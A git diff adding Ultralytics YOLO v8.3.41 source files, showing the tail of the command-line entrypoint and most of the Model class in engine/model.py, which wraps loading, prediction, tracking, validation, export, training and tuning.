spaces around '=' sign + if a.startswith("--"): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require leading dashes '--', updating to '{a[2:]}'.") + a = a[2:] + if a.endswith(","): + LOGGER.warning(f"WARNING ⚠️ argument '{a}' does not require trailing comma ',', updating to '{a[:-1]}'.") + a = a[:-1] + if "=" in a: + try: + k, v = parse_key_value_pair(a) + if k == "cfg" and v is not None: # custom.yaml passed + LOGGER.info(f"Overriding {DEFAULT_CFG_PATH} with {v}") + overrides = {k: val for k, val in yaml_load(checks.check_yaml(v)).items() if k != "cfg"} + else: + overrides[k] = v + except (NameError, SyntaxError, ValueError, AssertionError) as e: + check_dict_alignment(full_args_dict, {a: ""}, e) + + elif a in TASKS: + overrides["task"] = a + elif a in MODES: + overrides["mode"] = a + elif a.lower() in special: + special[a.lower()]() + return + elif a in DEFAULT_CFG_DICT and isinstance(DEFAULT_CFG_DICT[a], bool): + overrides[a] = True # auto-True for default bool args, i.e. 'yolo show' sets show=True + elif a in DEFAULT_CFG_DICT: + raise SyntaxError( + f"'{colorstr('red', 'bold', a)}' is a valid YOLO argument but is missing an '=' sign " + f"to set its value, i.e. try '{a}={DEFAULT_CFG_DICT[a]}'\n{CLI_HELP_MSG}" + ) + else: + check_dict_alignment(full_args_dict, {a: ""}) + + # Check keys + check_dict_alignment(full_args_dict, overrides) + + # Mode + mode = overrides.get("mode") + if mode is None: + mode = DEFAULT_CFG.mode or "predict" + LOGGER.warning(f"WARNING ⚠️ 'mode' argument is missing. Valid modes are {MODES}. Using default 'mode={mode}'.") + elif mode not in MODES: + raise ValueError(f"Invalid 'mode={mode}'. Valid modes are {MODES}.\n{CLI_HELP_MSG}") + + # Task + task = overrides.pop("task", None) + if task: + if task not in TASKS: + raise ValueError(f"Invalid 'task={task}'. Valid tasks are {TASKS}.\n{CLI_HELP_MSG}") + if "model" not in overrides: + overrides["model"] = TASK2MODEL[task] + + # Model + model = overrides.pop("model", DEFAULT_CFG.model) + if model is None: + model = "yolo11n.pt" + LOGGER.warning(f"WARNING ⚠️ 'model' argument is missing. Using default 'model={model}'.") + overrides["model"] = model + stem = Path(model).stem.lower() + if "rtdetr" in stem: # guess architecture + from ultralytics import RTDETR + + model = RTDETR(model) # no task argument + elif "fastsam" in stem: + from ultralytics import FastSAM + + model = FastSAM(model) + elif "sam_" in stem or "sam2_" in stem or "sam2.1_" in stem: + from ultralytics import SAM + + model = SAM(model) + else: + from ultralytics import YOLO + + model = YOLO(model, task=task) + if isinstance(overrides.get("pretrained"), str): + model.load(overrides["pretrained"]) + + # Task Update + if task != model.task: + if task: + LOGGER.warning( + f"WARNING ⚠️ conflicting 'task={task}' passed with 'task={model.task}' model. " + f"Ignoring 'task={task}' and updating to 'task={model.task}' to match model." + ) + task = model.task + + # Mode + if mode in {"predict", "track"} and "source" not in overrides: + overrides["source"] = ( + "https://ultralytics.com/images/boats.jpg" if task == "obb" else DEFAULT_CFG.source or ASSETS + ) + LOGGER.warning(f"WARNING ⚠️ 'source' argument is missing. Using default 'source={overrides['source']}'.") + elif mode in {"train", "val"}: + if "data" not in overrides and "resume" not in overrides: + overrides["data"] = DEFAULT_CFG.data or TASK2DATA.get(task or DEFAULT_CFG.task, DEFAULT_CFG.data) + LOGGER.warning(f"WARNING ⚠️ 'data' argument is missing. Using default 'data={overrides['data']}'.") + elif mode == "export": + if "format" not in overrides: + overrides["format"] = DEFAULT_CFG.format or "torchscript" + LOGGER.warning(f"WARNING ⚠️ 'format' argument is missing. Using default 'format={overrides['format']}'.") + + # Run command in python + getattr(model, mode)(**overrides) # default args from model + + # Show help + LOGGER.info(f"💡 Learn more at https://docs.ultralytics.com/modes/{mode}") + + # Recommend VS Code extension + if IS_VSCODE and SETTINGS.get("vscode_msg", True): + LOGGER.info(vscode_msg()) + + +# Special modes -------------------------------------------------------------------------------------------------------- +def copy_default_cfg(): + """ + Copies the default configuration file and creates a new one with '_copy' appended to its name. + + This function duplicates the existing default configuration file (DEFAULT_CFG_PATH) and saves it + with '_copy' appended to its name in the current working directory. It provides a convenient way + to create a custom configuration file based on the default settings. + + Examples: + >>> copy_default_cfg() + # Output: default.yaml copied to /path/to/current/directory/default_copy.yaml + # Example YOLO command with this new custom cfg: + # yolo cfg='/path/to/current/directory/default_copy.yaml' imgsz=320 batch=8 + + Notes: + - The new configuration file is created in the current working directory. + - After copying, the function prints a message with the new file's location and an example + YOLO command demonstrating how to use the new configuration file. + - This function is useful for users who want to modify the default configuration without + altering the original file. + """ + new_file = Path.cwd() / DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml") + shutil.copy2(DEFAULT_CFG_PATH, new_file) + LOGGER.info( + f"{DEFAULT_CFG_PATH} copied to {new_file}\n" + f"Example YOLO command with this new custom cfg:\n yolo cfg='{new_file}' imgsz=320 batch=8" + ) + + +if __name__ == "__main__": + # Example: entrypoint(debug='yolo predict model=yolo11n.pt') + entrypoint(debug="") diff --git a/2024.ultralytics/v8.3.41/engine/model.py b/2024.ultralytics/v8.3.41/engine/model.py new file mode 100644 index 0000000..874613d --- /dev/null +++ b/2024.ultralytics/v8.3.41/engine/model.py @@ -0,0 +1,1174 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import inspect +from pathlib import Path +from typing import Dict, List, Union + +import numpy as np +import torch +from PIL import Image + +from ultralytics.cfg import TASK2DATA, get_cfg, get_save_dir +from ultralytics.engine.results import Results +from ultralytics.hub import HUB_WEB_ROOT, HUBTrainingSession +from ultralytics.nn.tasks import attempt_load_one_weight, guess_model_task, nn, yaml_model_load +from ultralytics.utils import ( + ARGV, + ASSETS, + DEFAULT_CFG_DICT, + LOGGER, + RANK, + SETTINGS, + callbacks, + checks, + emojis, + yaml_load, +) + + +class Model(nn.Module): + """ + A base class for implementing YOLO models, unifying APIs across different model types. + + This class provides a common interface for various operations related to YOLO models, such as training, + validation, prediction, exporting, and benchmarking. It handles different types of models, including those + loaded from local files, Ultralytics HUB, or Triton Server. + + Attributes: + callbacks (Dict): A dictionary of callback functions for various events during model operations. + predictor (BasePredictor): The predictor object used for making predictions. + model (nn.Module): The underlying PyTorch model. + trainer (BaseTrainer): The trainer object used for training the model. + ckpt (Dict): The checkpoint data if the model is loaded from a *.pt file. + cfg (str): The configuration of the model if loaded from a *.yaml file. + ckpt_path (str): The path to the checkpoint file. + overrides (Dict): A dictionary of overrides for model configuration. + metrics (Dict): The latest training/validation metrics. + session (HUBTrainingSession): The Ultralytics HUB session, if applicable. + task (str): The type of task the model is intended for. + model_name (str): The name of the model. + + Methods: + __call__: Alias for the predict method, enabling the model instance to be callable. + _new: Initializes a new model based on a configuration file. + _load: Loads a model from a checkpoint file. + _check_is_pytorch_model: Ensures that the model is a PyTorch model. + reset_weights: Resets the model's weights to their initial state. + load: Loads model weights from a specified file. + save: Saves the current state of the model to a file. + info: Logs or returns information about the model. + fuse: Fuses Conv2d and BatchNorm2d layers for optimized inference. + predict: Performs object detection predictions. + track: Performs object tracking. + val: Validates the model on a dataset. + benchmark: Benchmarks the model on various export formats. + export: Exports the model to different formats. + train: Trains the model on a dataset. + tune: Performs hyperparameter tuning. + _apply: Applies a function to the model's tensors. + add_callback: Adds a callback function for an event. + clear_callback: Clears all callbacks for an event. + reset_callbacks: Resets all callbacks to their default functions. + + Examples: + >>> from ultralytics import YOLO + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict("image.jpg") + >>> model.train(data="coco8.yaml", epochs=3) + >>> metrics = model.val() + >>> model.export(format="onnx") + """ + + def __init__( + self, + model: Union[str, Path] = "yolo11n.pt", + task: str = None, + verbose: bool = False, + ) -> None: + """ + Initializes a new instance of the YOLO model class. + + This constructor sets up the model based on the provided model path or name. It handles various types of + model sources, including local files, Ultralytics HUB models, and Triton Server models. The method + initializes several important attributes of the model and prepares it for operations like training, + prediction, or export. + + Args: + model (Union[str, Path]): Path or name of the model to load or create. Can be a local file path, a + model name from Ultralytics HUB, or a Triton Server model. + task (str | None): The task type associated with the YOLO model, specifying its application domain. + verbose (bool): If True, enables verbose output during the model's initialization and subsequent + operations. + + Raises: + FileNotFoundError: If the specified model file does not exist or is inaccessible. + ValueError: If the model file or configuration is invalid or unsupported. + ImportError: If required dependencies for specific model types (like HUB SDK) are not installed. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = Model("path/to/model.yaml", task="detect") + >>> model = Model("hub_model", verbose=True) + """ + super().__init__() + self.callbacks = callbacks.get_default_callbacks() + self.predictor = None # reuse predictor + self.model = None # model object + self.trainer = None # trainer object + self.ckpt = None # if loaded from *.pt + self.cfg = None # if loaded from *.yaml + self.ckpt_path = None + self.overrides = {} # overrides for trainer object + self.metrics = None # validation/training metrics + self.session = None # HUB session + self.task = task # task type + model = str(model).strip() + + # Check if Ultralytics HUB model from https://hub.ultralytics.com + if self.is_hub_model(model): + # Fetch model from HUB + checks.check_requirements("hub-sdk>=0.0.12") + session = HUBTrainingSession.create_session(model) + model = session.model_file + if session.train_args: # training sent from HUB + self.session = session + + # Check if Triton Server model + elif self.is_triton_model(model): + self.model_name = self.model = model + return + + # Load or create new YOLO model + if Path(model).suffix in {".yaml", ".yml"}: + self._new(model, task=task, verbose=verbose) + else: + self._load(model, task=task) + + # Delete super().training for accessing self.model.training + del self.training + + def __call__( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Alias for the predict method, enabling the model instance to be callable for predictions. + + This method simplifies the process of making predictions by allowing the model instance to be called + directly with the required arguments. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source of + the image(s) to make predictions on. Can be a file path, URL, PIL image, numpy array, PyTorch + tensor, or a list/tuple of these. + stream (bool): If True, treat the input source as a continuous stream for predictions. + **kwargs (Any): Additional keyword arguments to configure the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model("https://ultralytics.com/images/bus.jpg") + >>> for r in results: + ... print(f"Detected {len(r)} objects in image") + """ + return self.predict(source, stream, **kwargs) + + @staticmethod + def is_triton_model(model: str) -> bool: + """ + Checks if the given model string is a Triton Server URL. + + This static method determines whether the provided model string represents a valid Triton Server URL by + parsing its components using urllib.parse.urlsplit(). + + Args: + model (str): The model string to be checked. + + Returns: + (bool): True if the model string is a valid Triton Server URL, False otherwise. + + Examples: + >>> Model.is_triton_model("http://localhost:8000/v2/models/yolov8n") + True + >>> Model.is_triton_model("yolo11n.pt") + False + """ + from urllib.parse import urlsplit + + url = urlsplit(model) + return url.netloc and url.path and url.scheme in {"http", "grpc"} + + @staticmethod + def is_hub_model(model: str) -> bool: + """ + Check if the provided model is an Ultralytics HUB model. + + This static method determines whether the given model string represents a valid Ultralytics HUB model + identifier. + + Args: + model (str): The model string to check. + + Returns: + (bool): True if the model is a valid Ultralytics HUB model, False otherwise. + + Examples: + >>> Model.is_hub_model("https://hub.ultralytics.com/models/MODEL") + True + >>> Model.is_hub_model("yolo11n.pt") + False + """ + return model.startswith(f"{HUB_WEB_ROOT}/models/") + + def _new(self, cfg: str, task=None, model=None, verbose=False) -> None: + """ + Initializes a new model and infers the task type from the model definitions. + + This method creates a new model instance based on the provided configuration file. It loads the model + configuration, infers the task type if not specified, and initializes the model using the appropriate + class from the task map. + + Args: + cfg (str): Path to the model configuration file in YAML format. + task (str | None): The specific task for the model. If None, it will be inferred from the config. + model (torch.nn.Module | None): A custom model instance. If provided, it will be used instead of creating + a new one. + verbose (bool): If True, displays model information during loading. + + Raises: + ValueError: If the configuration file is invalid or the task cannot be inferred. + ImportError: If the required dependencies for the specified task are not installed. + + Examples: + >>> model = Model() + >>> model._new("yolov8n.yaml", task="detect", verbose=True) + """ + cfg_dict = yaml_model_load(cfg) + self.cfg = cfg + self.task = task or guess_model_task(cfg_dict) + self.model = (model or self._smart_load("model"))(cfg_dict, verbose=verbose and RANK == -1) # build model + self.overrides["model"] = self.cfg + self.overrides["task"] = self.task + + # Below added to allow export from YAMLs + self.model.args = {**DEFAULT_CFG_DICT, **self.overrides} # combine default and model args (prefer model args) + self.model.task = self.task + self.model_name = cfg + + def _load(self, weights: str, task=None) -> None: + """ + Loads a model from a checkpoint file or initializes it from a weights file. + + This method handles loading models from either .pt checkpoint files or other weight file formats. It sets + up the model, task, and related attributes based on the loaded weights. + + Args: + weights (str): Path to the model weights file to be loaded. + task (str | None): The task associated with the model. If None, it will be inferred from the model. + + Raises: + FileNotFoundError: If the specified weights file does not exist or is inaccessible. + ValueError: If the weights file format is unsupported or invalid. + + Examples: + >>> model = Model() + >>> model._load("yolo11n.pt") + >>> model._load("path/to/weights.pth", task="detect") + """ + if weights.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): + weights = checks.check_file(weights, download_dir=SETTINGS["weights_dir"]) # download and return local file + weights = checks.check_model_file_from_stem(weights) # add suffix, i.e. yolov8n -> yolov8n.pt + + if Path(weights).suffix == ".pt": + self.model, self.ckpt = attempt_load_one_weight(weights) + self.task = self.model.args["task"] + self.overrides = self.model.args = self._reset_ckpt_args(self.model.args) + self.ckpt_path = self.model.pt_path + else: + weights = checks.check_file(weights) # runs in all cases, not redundant with above call + self.model, self.ckpt = weights, None + self.task = task or guess_model_task(weights) + self.ckpt_path = weights + self.overrides["model"] = weights + self.overrides["task"] = self.task + self.model_name = weights + + def _check_is_pytorch_model(self) -> None: + """ + Checks if the model is a PyTorch model and raises a TypeError if it's not. + + This method verifies that the model is either a PyTorch module or a .pt file. It's used to ensure that + certain operations that require a PyTorch model are only performed on compatible model types. + + Raises: + TypeError: If the model is not a PyTorch module or a .pt file. The error message provides detailed + information about supported model formats and operations. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model._check_is_pytorch_model() # No error raised + >>> model = Model("yolov8n.onnx") + >>> model._check_is_pytorch_model() # Raises TypeError + """ + pt_str = isinstance(self.model, (str, Path)) and Path(self.model).suffix == ".pt" + pt_module = isinstance(self.model, nn.Module) + if not (pt_module or pt_str): + raise TypeError( + f"model='{self.model}' should be a *.pt PyTorch model to run this method, but is a different format. " + f"PyTorch models can train, val, predict and export, i.e. 'model.train(data=...)', but exported " + f"formats like ONNX, TensorRT etc. only support 'predict' and 'val' modes, " + f"i.e. 'yolo predict model=yolov8n.onnx'.\nTo run CUDA or MPS inference please pass the device " + f"argument directly in your inference command, i.e. 'model.predict(source=..., device=0)'" + ) + + def reset_weights(self) -> "Model": + """ + Resets the model's weights to their initial state. + + This method iterates through all modules in the model and resets their parameters if they have a + 'reset_parameters' method. It also ensures that all parameters have 'requires_grad' set to True, + enabling them to be updated during training. + + Returns: + (Model): The instance of the class with reset weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.reset_weights() + """ + self._check_is_pytorch_model() + for m in self.model.modules(): + if hasattr(m, "reset_parameters"): + m.reset_parameters() + for p in self.model.parameters(): + p.requires_grad = True + return self + + def load(self, weights: Union[str, Path] = "yolo11n.pt") -> "Model": + """ + Loads parameters from the specified weights file into the model. + + This method supports loading weights from a file or directly from a weights object. It matches parameters by + name and shape and transfers them to the model. + + Args: + weights (Union[str, Path]): Path to the weights file or a weights object. + + Returns: + (Model): The instance of the class with loaded weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model() + >>> model.load("yolo11n.pt") + >>> model.load(Path("path/to/weights.pt")) + """ + self._check_is_pytorch_model() + if isinstance(weights, (str, Path)): + self.overrides["pretrained"] = weights # remember the weights for DDP training + weights, self.ckpt = attempt_load_one_weight(weights) + self.model.load(weights) + return self + + def save(self, filename: Union[str, Path] = "saved_model.pt") -> None: + """ + Saves the current model state to a file. + + This method exports the model's checkpoint (ckpt) to the specified filename. It includes metadata such as + the date, Ultralytics version, license information, and a link to the documentation. + + Args: + filename (Union[str, Path]): The name of the file to save the model to. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.save("my_model.pt") + """ + self._check_is_pytorch_model() + from copy import deepcopy + from datetime import datetime + + from ultralytics import __version__ + + updates = { + "model": deepcopy(self.model).half() if isinstance(self.model, nn.Module) else self.model, + "date": datetime.now().isoformat(), + "version": __version__, + "license": "AGPL-3.0 License (https://ultralytics.com/license)", + "docs": "https://docs.ultralytics.com", + } + torch.save({**self.ckpt, **updates}, filename) + + def info(self, detailed: bool = False, verbose: bool = True): + """ + Logs or returns model information. + + This method provides an overview or detailed information about the model, depending on the arguments + passed. It can control the verbosity of the output and return the information as a list. + + Args: + detailed (bool): If True, shows detailed information about the model layers and parameters. + verbose (bool): If True, prints the information. If False, returns the information as a list. + + Returns: + (List[str]): A list of strings containing various types of information about the model, including + model summary, layer details, and parameter counts. Empty if verbose is True. + + Raises: + TypeError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.info() # Prints model summary + >>> info_list = model.info(detailed=True, verbose=False) # Returns detailed info as a list + """ + self._check_is_pytorch_model() + return self.model.info(detailed=detailed, verbose=verbose) + + def fuse(self): + """ + Fuses Conv2d and BatchNorm2d layers in the model for optimized inference. + + This method iterates through the model's modules and fuses consecutive Conv2d and BatchNorm2d layers + into a single layer. This fusion can significantly improve inference speed by reducing the number of + operations and memory accesses required during forward passes. + + The fusion process typically involves folding the BatchNorm2d parameters (mean, variance, weight, and + bias) into the preceding Conv2d layer's weights and biases. This results in a single Conv2d layer that + performs both convolution and normalization in one step. + + Raises: + TypeError: If the model is not a PyTorch nn.Module. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.fuse() + >>> # Model is now fused and ready for optimized inference + """ + self._check_is_pytorch_model() + self.model.fuse() + + def embed( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Generates image embeddings based on the provided source. + + This method is a wrapper around the 'predict()' method, focusing on generating embeddings from an image + source. It allows customization of the embedding process through various keyword arguments. + + Args: + source (str | Path | int | List | Tuple | np.ndarray | torch.Tensor): The source of the image for + generating embeddings. Can be a file path, URL, PIL image, numpy array, etc. + stream (bool): If True, predictions are streamed. + **kwargs (Any): Additional keyword arguments for configuring the embedding process. + + Returns: + (List[torch.Tensor]): A list containing the image embeddings. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> image = "https://ultralytics.com/images/bus.jpg" + >>> embeddings = model.embed(image) + >>> print(embeddings[0].shape) + """ + if not kwargs.get("embed"): + kwargs["embed"] = [len(self.model.model) - 2] # embed second-to-last layer if no indices passed + return self.predict(source, stream, **kwargs) + + def predict( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + predictor=None, + **kwargs, + ) -> List[Results]: + """ + Performs predictions on the given image source using the YOLO model. + + This method facilitates the prediction process, allowing various configurations through keyword arguments. + It supports predictions with custom predictors or the default predictor method. The method handles different + types of image sources and can operate in a streaming mode. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source + of the image(s) to make predictions on. Accepts various types including file paths, URLs, PIL + images, numpy arrays, and torch tensors. + stream (bool): If True, treats the input source as a continuous stream for predictions. + predictor (BasePredictor | None): An instance of a custom predictor class for making predictions. + If None, the method uses a default predictor. + **kwargs (Any): Additional keyword arguments for configuring the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict(source="path/to/image.jpg", conf=0.25) + >>> for r in results: + ... print(r.boxes.data) # print detection bounding boxes + + Notes: + - If 'source' is not provided, it defaults to the ASSETS constant with a warning. + - The method sets up a new predictor if not already present and updates its arguments with each call. + - For SAM-type models, 'prompts' can be passed as a keyword argument. + """ + if source is None: + source = ASSETS + LOGGER.warning(f"WARNING ⚠️ 'source' is missing. Using 'source={source}'.") + + is_cli = (ARGV[0].endswith("yolo") or ARGV[0].endswith("ultralytics")) and any( + x in ARGV for x in ("predict", "track", "mode=predict", "mode=track") + ) + + custom = {"conf": 0.25, "batch": 1, "save": is_cli, "mode": "predict"} # method defaults + args = {**self.overrides, **custom, **kwargs} # highest priority args on the right + prompts = args.pop("prompts", None) # for SAM-type models + + if not self.predictor: + self.predictor = (predictor or self._smart_load("predictor"))(overrides=args, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=is_cli) + else: # only update args if predictor is already setup + self.predictor.args = get_cfg(self.predictor.args, args) + if "project" in args or "name" in args: + self.predictor.save_dir = get_save_dir(self.predictor.args) + if prompts and hasattr(self.predictor, "set_prompts"): # for SAM-type models + self.predictor.set_prompts(prompts) + return self.predictor.predict_cli(source=source) if is_cli else self.predictor(source=source, stream=stream) + + def track( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + persist: bool = False, + **kwargs, + ) -> List[Results]: + """ + Conducts object tracking on the specified input source using the registered trackers. + + This method performs object tracking using the model's predictors and optionally registered trackers. It handles + various input sources such as file paths or video streams, and supports customization through keyword arguments. + The method registers trackers if not already present and can persist them between calls. + + Args: + source (Union[str, Path, int, List, Tuple, np.ndarray, torch.Tensor], optional): Input source for object + tracking. Can be a file path, URL, or video stream. + stream (bool): If True, treats the input source as a continuous video stream. Defaults to False. + persist (bool): If True, persists trackers between different calls to this method. Defaults to False. + **kwargs (Any): Additional keyword arguments for configuring the tracking process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of tracking results, each a Results object. + + Raises: + AttributeError: If the predictor does not have registered trackers. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.track(source="path/to/video.mp4", show=True) + >>> for r in results: + ... print(r.boxes.id) # print tracking IDs + + Notes: + - This method sets a default confidence threshold of 0.1 for ByteTrack-based tracking. + - The tracking mode is explicitly set in the keyword arguments. + - Batch size is set to 1 for tracking in videos. + """ + if not hasattr(self.predictor, "trackers"): + from ultralytics.trackers import register_tracker + + register_tracker(self, persist) + kwargs["conf"] = kwargs.get("conf") or 0.1 # ByteTrack-based method needs low confidence predictions as input + kwargs["batch"] = kwargs.get("batch") or 1 # batch-size 1 for tracking in videos + kwargs["mode"] = "track" + return self.predict(source=source, stream=stream, **kwargs) + + def val( + self, + validator=None, + **kwargs, + ): + """ + Validates the model using a specified dataset and validation configuration. + + This method facilitates the model validation process, allowing for customization through various settings. It + supports validation with a custom validator or the default validation approach. The method combines default + configurations, method-specific defaults, and user-provided arguments to configure the validation process. + + Args: + validator (ultralytics.engine.validator.BaseValidator | None): An instance of a custom validator class for + validating the model. + **kwargs (Any): Arbitrary keyword arguments for customizing the validation process. + + Returns: + (ultralytics.utils.metrics.DetMetrics): Validation metrics obtained from the validation process. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.val(data="coco8.yaml", imgsz=640) + >>> print(results.box.map) # Print mAP50-95 + """ + custom = {"rect": True} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "val"} # highest priority args on the right + + validator = (validator or self._smart_load("validator"))(args=args, _callbacks=self.callbacks) + validator(model=self.model) + self.metrics = validator.metrics + return validator.metrics + + def benchmark( + self, + **kwargs, + ): + """ + Benchmarks the model across various export formats to evaluate performance. + + This method assesses the model's performance in different export formats, such as ONNX, TorchScript, etc. + It uses the 'benchmark' function from the ultralytics.utils.benchmarks module. The benchmarking is + configured using a combination of default configuration values, model-specific arguments, method-specific + defaults, and any additional user-provided keyword arguments. + + Args: + **kwargs (Any): Arbitrary keyword arguments to customize the benchmarking process. These are combined with + default configurations, model-specific arguments, and method defaults. Common options include: + - data (str): Path to the dataset for benchmarking. + - imgsz (int | List[int]): Image size for benchmarking. + - half (bool): Whether to use half-precision (FP16) mode. + - int8 (bool): Whether to use int8 precision mode. + - device (str): Device to run the benchmark on (e.g., 'cpu', 'cuda'). + - verbose (bool): Whether to print detailed benchmark information. + + Returns: + (Dict): A dictionary containing the results of the benchmarking process, including metrics for + different export formats. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.benchmark(data="coco8.yaml", imgsz=640, half=True) + >>> print(results) + """ + self._check_is_pytorch_model() + from ultralytics.utils.benchmarks import benchmark + + custom = {"verbose": False} # method defaults + args = {**DEFAULT_CFG_DICT, **self.model.args, **custom, **kwargs, "mode": "benchmark"} + return benchmark( + model=self, + data=kwargs.get("data"), # if no 'data' argument passed set data=None for default datasets + imgsz=args["imgsz"], + half=args["half"], + int8=args["int8"], + device=args["device"], + verbose=kwargs.get("verbose"), + ) + + def export( + self, + **kwargs, + ) -> str: + """ + Exports the model to a different format suitable for deployment. + + This method facilitates the export of the model to various formats (e.g., ONNX, TorchScript) for deployment + purposes. It uses the 'Exporter' class for the export process, combining model-specific overrides, method + defaults, and any additional arguments provided. + + Args: + **kwargs (Dict): Arbitrary keyword arguments to customize the export process. These are combined with + the model's overrides and method defaults. Common arguments include: + format (str): Export format (e.g., 'onnx', 'engine', 'coreml'). + half (bool): Export model in half-precision. + int8 (bool): Export model in int8 precision. + device (str): Device to run the export on. + workspace (int): Maximum memory workspace size for TensorRT engines. + nms (bool): Add Non-Maximum Suppression (NMS) module to model. + simplify (bool): Simplify ONNX model. + + Returns: + (str): The path to the exported model file. + + Raises: + AssertionError: If the model is not a PyTorch model. + ValueError: If an unsupported export format is specified. + RuntimeError: If the export process fails due to errors. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.export(format="onnx", dynamic=True, simplify=True) + 'path/to/exported/model.onnx' + """ + self._check_is_pytorch_model() + from .exporter import Exporter + + custom = { + "imgsz": self.model.args["imgsz"], + "batch": 1, + "data": None, + "device": None, # reset to avoid multi-GPU errors + "verbose": False, + } # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "export"} # highest priority args on the right + return Exporter(overrides=args, _callbacks=self.callbacks)(model=self.model) + + def train( + self, + trainer=None, + **kwargs, + ): + """ + Trains the model using the specified dataset and training configuration. + + This method facilitates model training with a range of customizable settings. It supports training with a + custom trainer or the default training approach. The method handles scenarios such as resuming training + from a checkpoint, integrating with Ultralytics HUB, and updating model and configuration after training. + + When using Ultralytics HUB, if the session has a loaded model, the method prioritizes HUB training + arguments and warns if local arguments are provided. It checks for pip updates and combines default + configurations, method-specific defaults, and user-provided arguments to configure the training process. + + Args: + trainer (BaseTrainer | None): Custom trainer instance for model training. If None, uses default. + **kwargs (Any): Arbitrary keyword arguments for training configuration. Common options include: + data (str): Path to dataset configuration file. + epochs (int): Number of training epochs. + batch_size (int): Batch size for training. + imgsz (int): Input image size. + device (str): Device to run training on (e.g., 'cuda', 'cpu'). + workers (int): Number of worker threads for data loading. + optimizer (str): Optimizer to use for training. + lr0 (float): Initial learning rate. + patience (int): Epochs to wait for no observable improvement for early stopping of training. + + Returns: + (Dict | None): Training metrics if available and training is successful; otherwise, None. + + Raises: + AssertionError: If the model is not a PyTorch model. + PermissionError: If there is a permission issue with the HUB session. + ModuleNotFoundError: If the HUB SDK is not installed. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.train(data="coco8.yaml", epochs=3) + """ + self._check_is_pytorch_model() + if hasattr(self.session, "model") and self.session.model.id: # Ultralytics HUB session with loaded model + if any(kwargs): + LOGGER.warning("WARNING ⚠️ using HUB training arguments, ignoring local training arguments.") + kwargs = self.session.train_args # overwrite kwargs + + checks.check_pip_update_available() + + overrides = yaml_load(checks.check_yaml(kwargs["cfg"])) if kwargs.get("cfg") else self.overrides + custom = { + # NOTE: handle the case when 'cfg' includes 'data'. + "data": overrides.get("data") or DEFAULT_CFG_DICT["data"] or TASK2DATA[self.task], + "model": self.overrides["model"], + "task": self.task, + } # method defaults + args = {**overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + if args.get("resume"): + args["resume"] = self.ckpt_path + + self.trainer = (trainer or self._smart_load("trainer"))(overrides=args, _callbacks=self.callbacks) + if not args.get("resume"): # manually set model only if not resuming + self.trainer.model = self.trainer.get_model(weights=self.model if self.ckpt else None, cfg=self.model.yaml) + self.model = self.trainer.model + + self.trainer.hub_session = self.session # attach optional HUB session + self.trainer.train() + # Update model and cfg after training + if RANK in {-1, 0}: + ckpt = self.trainer.best if self.trainer.best.exists() else self.trainer.last + self.model, _ = attempt_load_one_weight(ckpt) + self.overrides = self.model.args + self.metrics = getattr(self.trainer.validator, "metrics", None) # TODO: no metrics returned by DDP + return self.metrics + + def tune( + self, + use_ray=False, + iterations=10, + *args, + **kwargs, + ): + """ + Conducts hyperparameter tuning for the model, with an option to use Ray Tune. + + This method supports two modes of hyperparameter tuning: using Ray Tune or a custom tuning method. + When Ray Tune is enabled, it leverages the 'run_ray_tune' function from the ultralytics.utils.tuner module. + Otherwise, it uses the internal 'Tuner' class for tuning. The method combines default, overridden, and + custom arguments to configure the tuning process. + + Args: + use_ray (bool): If True, uses Ray Tune for hyperparameter tuning. Defaults to False. + iterations (int): The number of tuning iterations to perform. Defaults to 10. + *args (List): Variable length argument list for additional arguments. + **kwargs (Dict): Arbitrary keyword arguments. These are combined with the model's overrides and defaults. + + Returns: + (Dict): A dictionary containing the results of the hyperparameter search. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.tune(use_ray=True, iterations=20) + >>> print(results) + """ + self._check_is_pytorch_model() + if use_ray: + from ultralytics.utils.tuner import run_ray_tune + + return run_ray_tune(self, max_samples=iterations, *args, **kwargs) + else: + from .tuner import Tuner + + custom = {} # method defaults + args = {**self.overrides, **custom, 